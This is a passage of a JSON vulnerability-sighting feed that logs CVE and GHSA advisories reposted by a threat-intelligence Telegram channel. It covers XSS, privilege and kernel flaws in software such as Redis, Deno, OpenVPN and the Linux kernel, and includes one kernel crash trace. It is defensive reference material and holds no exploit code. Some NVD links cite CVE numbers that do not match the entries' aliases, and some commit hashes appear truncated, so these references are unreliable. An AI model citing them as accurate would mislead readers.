https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:31.000000Z"}, {"uuid": "23b623ad-9f8d-486d-a777-a2ba74407d21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7MXJ-3F68-P2V6", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/161", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-7mxj-3f68-p2v6\n\ud83d\udd17 Aliases: CVE-2024-11849\n\ud83d\udd39 Details: The Pods  WordPress plugin before 3.2.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-11849\n2. https://wpscan.com/vulnerability/85b25a5b-c30b-4a2a-96c1-f05b4eba8a9b", "creation_timestamp": "2025-01-06T06:40:36.000000Z"}, {"uuid": "71c6753f-b090-4959-8303-c900007ffa31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2H9F-XM25-Q379", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/165", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-2h9f-xm25-q379\n\ud83d\udd17 Aliases: CVE-2024-20153\n\ud83d\udd39 Details: In wlan STA, there is a possible way to trick a client to connect to an AP with spoofed SSID. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08990446 / ALPS09057442; Issue ID: MSV-1598.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-304\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20153\n2. https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:44.000000Z"}, {"uuid": "2fb88a5c-f0b1-466d-a5fd-af4e50c70444", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58C3-GQJ2-FVQ8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/170", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-58c3-gqj2-fvq8\n\ud83d\udd17 Aliases: CVE-2024-56673\n\ud83d\udd39 Details: In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: mm: Do not call pmd dtor on vmemmap page table teardown\n\nThe vmemmap's, which is used for RV64 with SPARSEMEM_VMEMMAP, page\ntables are populated using pmd (page middle directory) hugetables.\nHowever, the pmd allocation is not using the generic mechanism used by\nthe VMA code (e.g. pmd_alloc()), or the RISC-V specific\ncreate_pgd_mapping()/alloc_pmd_late(). Instead, the vmemmap page table\ncode allocates a page, and calls vmemmap_set_pmd(). This results in\nthat the pmd ctor is *not* called, nor would it make sense to do so.\n\nNow, when tearing down a vmemmap page table pmd, the cleanup code\nwould unconditionally, and incorrectly call the pmd dtor, which\nresults in a crash (best case).\n\nThis issue was found when running the HMM selftests:\n\n  | tools/testing/selftests/mm# ./test_hmm.sh smoke\n  | ... # when unloading the test_hmm.ko module\n  | page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10915b\n  | flags: 0x1000000000000000(node=0|zone=1)\n  | raw: 1000000000000000 0000000000000000 dead000000000122 0000000000000000\n  | raw: 0000000000000000 0000000000000000 00000001ffffffff 0000000000000000\n  | page dumped because: VM_BUG_ON_PAGE(ptdesc-&gt;pmd_huge_pte)\n  | ------------[ cut here ]------------\n  | kernel BUG at include/linux/mm.h:3080!\n  | Kernel BUG [#1]\n  | Modules linked in: test_hmm(-) sch_fq_codel fuse drm drm_panel_orientation_quirks backlight dm_mod\n  | CPU: 1 UID: 0 PID: 514 Comm: modprobe Tainted: G        W          6.12.0-00982-gf2a4f1682d07 #2\n  | Tainted: [W]=WARN\n  | Hardware name: riscv-virtio qemu/qemu, BIOS 2024.10 10/01/2024\n  | epc : remove_pgd_mapping+0xbec/0x1070\n  |  ra : remove_pgd_mapping+0xbec/0x1070\n  | epc : ffffffff80010a68 ra : ffffffff80010a68 sp : ff20000000a73940\n  |  gp : ffffffff827b2d88 tp : ff6000008785da40 t0 : ffffffff80fbce04\n  |  t1 : 0720072007200720 t2 : 706d756420656761 s0 : ff20000000a73a50\n  |  s1 : ff6000008915cff8 a0 : 0000000000000039 a1 : 0000000000000008\n  |  a2 : ff600003fff0de20 a3 : 0000000000000000 a4 : 0000000000000000\n  |  a5 : 0000000000000000 a6 : c0000000ffffefff a7 : ffffffff824469b8\n  |  s2 : ff1c0000022456c0 s3 : ff1ffffffdbfffff s4 : ff6000008915c000\n  |  s5 : ff6000008915c000 s6 : ff6000008915c000 s7 : ff1ffffffdc00000\n  |  s8 : 0000000000000001 s9 : ff1ffffffdc00000 s10: ffffffff819a31f0\n  |  s11: ffffffffffffffff t3 : ffffffff8000c950 t4 : ff60000080244f00\n  |  t5 : ff60000080244000 t6 : ff20000000a73708\n  | status: 0000000200000120 badaddr: ffffffff80010a68 cause: 0000000000000003\n  | [] remove_pgd_mapping+0xbec/0x1070\n  | [] vmemmap_free+0x14/0x1e\n  | [] section_deactivate+0x220/0x452\n  | [] sparse_remove_section+0x4a/0x58\n  | [] __remove_pages+0x7e/0xba\n  | [] memunmap_pages+0x2bc/0x3fe\n  | [] dmirror_device_remove_chunks+0x2ea/0x518 [test_hmm]\n  | [] hmm_dmirror_exit+0x3e/0x1018 [test_hmm]\n  | [] __riscv_sys_delete_module+0x15a/0x2a6\n  | [] do_trap_ecall_u+0x1f2/0x266\n  | [] _new_vmalloc_restore_context_a0+0xc6/0xd2\n  | Code: bf51 7597 0184 8593 76a5 854a 4097 0029 80e7 2c00 (9002) 7597\n  | ---[ end trace 0000000000000000 ]---\n  | Kernel panic - not syncing: Fatal exception in interrupt\n\nAdd a check to avoid calling the pmd dtor, if the calling context is\nvmemmap_free().\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:30:59Z\n\ud83d\uddd3\ufe0f Published: 2024-12-27T15:31:56Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-5663\n2. https://git.kernel.org/stable/c/21f1b85c8912262adf510e63614a114425eb10\n3. https://git.kernel.org/stable/c/344945806f2faf68be98bac02836c86f223aa9", "creation_timestamp": "2025-01-06T15:37:42.000000Z"}, {"uuid": "112b2009-35c8-4470-b75e-32471a2a9238", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F2H8-4W6P-535W", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/167", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-f2h8-4w6p-535w\n\ud83d\udd17 Aliases: CVE-2024-5594\n\ud83d\udd39 Details: OpenVPN before 2.6.11 does not santize PUSH_REPLY messages properly which attackers can use to inject unexpected arbitrary data into third-party executables or plug-ins.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:31:00Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T15:31:00Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-1287\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-5594\n2. https://community.openvpn.net/openvpn/wiki/CVE-2024-5594\n3. https://www.mail-archive.com/openvpn-users@lists.sourceforge.net/msg0634.html", "creation_timestamp": "2025-01-06T15:36:48.000000Z"}, {"uuid": "b7fa8b36-32f2-4a77-a88b-82d434c81e9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-79XQ-2CPC-PJFM", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/169", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-79xq-2cpc-pjfm\n\ud83d\udd17 Aliases: CVE-2025-22383\n\ud83d\udd39 Details: An issue was discovered in Optimizely Configured Commerce before 5.2.2408. A medium-severity input validation issue exists in the Commerce B2B application, affecting the Contact Us functionality. This allows visitors to send e-mail messages that could contain unfiltered HTML markup in specific scenarios.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:30:59Z\n\ud83d\uddd3\ufe0f Published: 2025-01-04T03:33:08Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-79\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-22383\n2. https://support.optimizely.com/hc/en-us/articles/32694923652493-Configured-Commerce-Security-Advisory-COM-2024-03", "creation_timestamp": "2025-01-06T15:37:32.000000Z"}, {"uuid": "ccf44075-71a8-4a46-ade4-b8d0ca0a2663", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PPP3-73JM-5RM6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/168", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-ppp3-73jm-5rm6\n\ud83d\udd17 Aliases: CVE-2024-56675\n\ud83d\udd39 Details: In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix UAF via mismatching bpf_prog/attachment RCU flavors\n\nUprobes always use bpf_prog_run_array_uprobe() under tasks-trace-RCU\nprotection. But it is possible to attach a non-sleepable BPF program to a\nuprobe, and non-sleepable BPF programs are freed via normal RCU (see\n__bpf_prog_put_noref()). This leads to UAF of the bpf_prog because a normal\nRCU grace period does not imply a tasks-trace-RCU grace period.\n\nFix it by explicitly waiting for a tasks-trace-RCU grace period after\nremoving the attachment of a bpf_prog to a perf_event.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:30:59Z\n\ud83d\uddd3\ufe0f Published: 2024-12-27T15:31:56Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-416\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-5665\n2. https://git.kernel.org/stable/c/9245459a992d22fe0e92e988f49db1fec82c184a\n3. https://git.kernel.org/stable/c/9b53d2c2a38a1effc341d99be3f99faef104d\n4. https://git.kernel.org/stable/c/ef1b808e3bc98612feceedf985c2fbbeb28f956\n5. https://git.kernel.org/stable/c/f9f85df30118f3f411261e6682fc60ebcce23e5", "creation_timestamp": "2025-01-06T15:37:11.000000Z"}, {"uuid": "c736da26-e304-4553-92bf-065361f5cd00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FG9X-WVQW-6GMW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/540", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-47640\n\ud83d\udd39 Description: DataHub is an open-source metadata platform. The HMAC signature for DataHub Frontend sessions was being signed using a SHA-1 HMAC with the frontend secret key. SHA1 with a 10 byte key can be brute forced using sufficient resources (i.e. state level actors with large computational capabilities). DataHub Frontend was utilizing the Play LegacyCookiesModule with default settings which utilizes a SHA1 HMAC for signing. This is compounded by using a shorter key length than recommended by default for the signing key for the randomized secret value. An authenticated attacker (or attacker who has otherwise obtained a session token) could crack the signing key for DataHub and obtain escalated privileges by generating a privileged session cookie. Due to key length being a part of the risk, deployments should update to the latest helm chart and rotate their session signing secret. All deployments using the default helm chart configurations for generating the Play secret key used for signing are affected by this vulnerability. Version 0.11.1 resolves this vulnerability. All users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2023-11-14T20:55:02.080Z\n\ud83d\udccf Modified: 2025-01-07T19:13:55.393Z\n\ud83d\udd17 References:\n1. https://github.com/datahub-project/datahub/security/advisories/GHSA-fg9x-wvqw-6gmw", "creation_timestamp": "2025-01-07T19:39:32.000000Z"}, {"uuid": "a3b4ce5b-2c00-49e9-b6aa-dacf0aa36225", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GF8R-4P6M-V8VR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/709", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33968\n\ud83d\udd39 Description: Kanboard is open source project management software that focuses on the Kanban methodology. Versions prior to 1.2.30 are subject to a missing access control vulnerability that allows a user with low privileges to create or transfer tasks to any project within the software, even if they have not been invited or the project is personal. The vulnerable features are `Duplicate to project` and `Move to project`, which both utilize the `checkDestinationProjectValues()` function to check his values. This issue has been addressed in version 1.2.30. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2023-06-05T19:49:17.550Z\n\ud83d\udccf Modified: 2025-01-08T16:02:26.334Z\n\ud83d\udd17 References:\n1. https://github.com/kanboard/kanboard/security/advisories/GHSA-gf8r-4p6m-v8vr\n2. https://github.com/kanboard/kanboard/commit/c20be8f5fa26e54005a90c645e80b11481a65053", "creation_timestamp": "2025-01-08T16:14:19.000000Z"}, {"uuid": "1243a850-42bc-45f5-a9f3-5ede03403a5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5CR9-5JX3-2G39", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/724", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-34103\n\ud83d\udd39 Description: Avo is an open source ruby on rails admin panel creation framework. In affected versions some avo fields are vulnerable to Cross Site Scripting (XSS) when rendering html based content. Attackers do need form edit privilege in order to successfully exploit this vulnerability, but the results are stored and no specific timing is required. This issue has been addressed in commit `7891c01e` which is expected to be included in the next release of avo. Users are advised to configure CSP headers for their application and to limit untrusted user access as a mitigation.\n\ud83d\udccf Published: 2023-06-05T22:13:21.458Z\n\ud83d\udccf Modified: 2025-01-08T15:49:17.811Z\n\ud83d\udd17 References:\n1. https://github.com/avo-hq/avo/security/advisories/GHSA-5cr9-5jx3-2g39\n2. https://github.com/avo-hq/avo/commit/7891c01e1fba9ca5d7dbccc43d27f385e5d08563", "creation_timestamp": "2025-01-08T16:19:40.000000Z"}, {"uuid": "a8de0a91-3469-4716-9179-843c19a20a9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H53W-7QW7-VH5C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/226", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-34232\n\ud83d\udd39 Description: snowflake-connector-nodejs, a NodeJS driver for Snowflake, is vulnerable to command injection via single sign on (SSO) browser URL authentication in versions prior to 1.6.21. In order to exploit the potential for command injection, an attacker would need to be successful in (1) establishing a malicious resource and (2) redirecting users to utilize the resource. The attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user\u2019s local machine would render the malicious payload, leading to a remote code execution. This attack scenario can be mitigated through URL whitelisting as well as common anti-phishing resources. Version 1.6.21 contains a patch for this issue.\n\ud83d\udccf Published: 2023-06-08T20:17:49.734Z\n\ud83d\udccf Modified: 2025-01-06T20:19:54.764Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/snowflake-connector-nodejs/security/advisories/GHSA-h53w-7qw7-vh5c\n2. https://github.com/snowflakedb/snowflake-connector-nodejs/pull/465\n3. https://github.com/snowflakedb/snowflake-connector-nodejs/commit/0c9622ae12cd7d627df404b73a783b4a5f60728a\n4. https://community.snowflake.com/s/article/Node-js-Driver-Release-Notes", "creation_timestamp": "2025-01-06T20:49:59.000000Z"}, {"uuid": "5fbe79d7-e67b-4640-96b2-d5b8e5510f06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RCG8-G69V-X23J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/236", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-21616\n\ud83d\udd39 Description: Plane is an open-source project management tool. A cross-site scripting (XSS) vulnerability has been identified in Plane versions prior to 0.23. The vulnerability allows authenticated users to upload SVG files containing malicious JavaScript code as profile images, which gets executed in victims' browsers when viewing the profile image.\n\ud83d\udccf Published: 2025-01-06T21:22:24.129Z\n\ud83d\udccf Modified: 2025-01-06T21:22:24.129Z\n\ud83d\udd17 References:\n1. https://github.com/makeplane/plane/security/advisories/GHSA-rcg8-g69v-x23j", "creation_timestamp": "2025-01-06T21:36:04.000000Z"}, {"uuid": "9761ab55-5935-4c3e-a10b-3b63695d882d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FFHJ-HPRX-7QVR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/497", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-21623\n\ud83d\udd39 Description: ClipBucket V5 provides open source video hosting with PHP. Prior to 5.5.1 - 238, ClipBucket V5 allows unauthenticated attackers to change the template directory via a directory traversal, which results in a denial of service.\n\ud83d\udccf Published: 2025-01-07T15:43:11.353Z\n\ud83d\udccf Modified: 2025-01-07T17:04:44.391Z\n\ud83d\udd17 References:\n1. https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-ffhj-hprx-7qvr\n2. https://github.com/MacWarrior/clipbucket-v5/commit/75d663f010cd8569eb9e278f030838174fb30188", "creation_timestamp": "2025-01-07T17:42:22.000000Z"}, {"uuid": "246990bd-80da-49fc-a22c-f8626db5f165", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-39H2-X6C4-6W4C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/243", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-46981\n\ud83d\udd39 Description: Redis is an open source, in-memory database that persists on disk. An authenticated user may use a specially crafted Lua script to manipulate the garbage collector and potentially lead to remote code execution. The problem is fixed in 7.4.2, 7.2.7, and 6.2.17. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands.\n\ud83d\udccf Published: 2025-01-06T21:11:51.687Z\n\ud83d\udccf Modified: 2025-01-06T21:11:51.687Z\n\ud83d\udd17 References:\n1. https://github.com/redis/redis/security/advisories/GHSA-39h2-x6c4-6w4c\n2. https://github.com/redis/redis/releases/tag/6.2.17\n3. https://github.com/redis/redis/releases/tag/7.2.7\n4. https://github.com/redis/redis/releases/tag/7.4.2", "creation_timestamp": "2025-01-06T21:37:03.000000Z"}, {"uuid": "431c4d27-122e-4a25-8650-65464b413752", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F27P-CMV8-XHM6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-21620\n\ud83d\udd39 Description: Deno is a JavaScript, TypeScript, and WebAssembly runtime with secure defaults. When you send a request with the Authorization header to one domain, and the response asks to redirect to a different domain, Deno'sfetch() redirect handling creates a follow-up redirect request that keeps the original Authorization header, leaking its content to that second domain. This vulnerability is fixed in 2.1.2.\n\ud83d\udccf Published: 2025-01-06T22:26:40.723Z\n\ud83d\udccf Modified: 2025-01-06T22:26:40.723Z\n\ud83d\udd17 References:\n1. https://github.com/denoland/deno/security/advisories/GHSA-f27p-cmv8-xhm6", "creation_timestamp": "2025-01-06T22:36:55.000000Z"}, {"uuid": "ea74cd4e-375f-42e5-8862-3e77a3a2ce31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0485", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/272", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6596\n\ud83d\udd39 Description: An incomplete fix was shipped for the Rapid Reset (CVE-2023-44487/CVE-2023-39325) vulnerability for an OpenShift Containers.\n\ud83d\udccf Published: 2024-04-25T16:00:24.215Z\n\ud83d\udccf Modified: 2025-01-06T22:01:20.326Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0485\n2. https://access.redhat.com/errata/RHSA-2024:0682\n3. https://access.redhat.com/security/cve/CVE-2023-6596\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2253521", "creation_timestamp": "2025-01-06T22:38:24.000000Z"}, {"uuid": "4c4269dc-ebd5-41ed-8470-65a55b959e75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0682", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/272", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6596\n\ud83d\udd39 Description: An incomplete fix was shipped for the Rapid Reset (CVE-2023-44487/CVE-2023-39325) vulnerability for an OpenShift Containers.\n\ud83d\udccf Published: 2024-04-25T16:00:24.215Z\n\ud83d\udccf Modified: 2025-01-06T22:01:20.326Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0485\n2. https://access.redhat.com/errata/RHSA-2024:0682\n3. https://access.redhat.com/security/cve/CVE-2023-6596\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2253521", "creation_timestamp": "2025-01-06T22:38:24.000000Z"}, {"uuid": "7ddaf2d2-0df8-4f0f-aeeb-685e50709981", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8534", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/271", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-10033\n\ud83d\udd39 Description: A vulnerability was found in aap-gateway. A Cross-site Scripting (XSS) vulnerability exists in the gateway component. This flaw allows a malicious user to perform actions that impact users by using the \"?next=\" in a URL, which can lead to redirecting, injecting malicious script, stealing sessions and data.\n\ud83d\udccf Published: 2024-10-16T16:59:43.968Z\n\ud83d\udccf Modified: 2025-01-06T22:01:25.224Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8534\n2. https://access.redhat.com/security/cve/CVE-2024-10033\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2319162", "creation_timestamp": "2025-01-06T22:38:18.000000Z"}, {"uuid": "3def5c1a-1791-4096-9e28-4319a92cf36a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8678", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/270", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-01-06T22:01:58.132Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/security/cve/CVE-2024-9355\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-01-06T22:38:12.000000Z"}, {"uuid": "5140c743-5eb9-4471-b7cf-07a1681a870f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8847", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/270", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-01-06T22:01:58.132Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/security/cve/CVE-2024-9355\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-01-06T22:38:12.000000Z"}, {"uuid": "cc7609e5-5f3c-4dca-966e-e222a3653f57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7550", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/270", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-01-06T22:01:58.132Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/security/cve/CVE-2024-9355\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-01-06T22:38:12.000000Z"}, {"uuid": "6a9db645-932e-48c1-8699-eb7a7ef147e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 